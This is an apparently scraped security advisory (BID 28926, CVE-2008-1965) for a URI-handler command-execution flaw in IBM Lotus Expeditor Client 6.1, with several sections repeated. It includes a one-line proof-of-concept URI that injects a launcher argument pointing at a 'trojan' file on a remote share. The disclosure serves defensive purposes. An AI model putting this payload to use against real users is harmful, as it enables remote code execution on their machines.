IBM Lotus Expeditor URI Handler Command Execution Vulnerability
BID:28926
Info
IBM Lotus Expeditor URI Handler Command Execution Vulnerability
| Bugtraq ID: | 28926 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1965 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 24 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | Thomas Pollet |
| Vulnerable: |
IBM Lotus Expeditor Client 6.1 |
| Not Vulnerable: | |
Discussion
IBM Lotus Expeditor URI Handler Command Execution Vulnerability
IBM Lotus Expeditor is prone to a command-execution vulnerability because it fails to properly sanitize input.
Successfully exploiting this issue allows remote attackers to execute arbitrary commands in the context of users that follow malicious URIs.
We don't know which specific versions of IBM Lotus Expeditor are affected. We will update this BID as more information emerges.
IBM Lotus Expeditor is prone to a command-execution vulnerability because it fails to properly sanitize input.
Successfully exploiting this issue allows remote attackers to execute arbitrary commands in the context of users that follow malicious URIs.
We don't know which specific versions of IBM Lotus Expeditor are affected. We will update this BID as more information emerges.
Exploit / POC
IBM Lotus Expeditor URI Handler Command Execution Vulnerability
The following proof-of-concept URI demonstrates this vulnerability:
cai:"%20-launcher%20\\6.6.6.6\d$\trojan
The following proof-of-concept URI demonstrates this vulnerability:
cai:"%20-launcher%20\\6.6.6.6\d$\trojan
Solution / Fix
IBM Lotus Expeditor URI Handler Command Execution Vulnerability
Solution:
A vendor patch is available. Please contact the vendor for details.
Solution:
A vendor patch is available. Please contact the vendor for details.
References
IBM Lotus Expeditor URI Handler Command Execution Vulnerability
References:
References: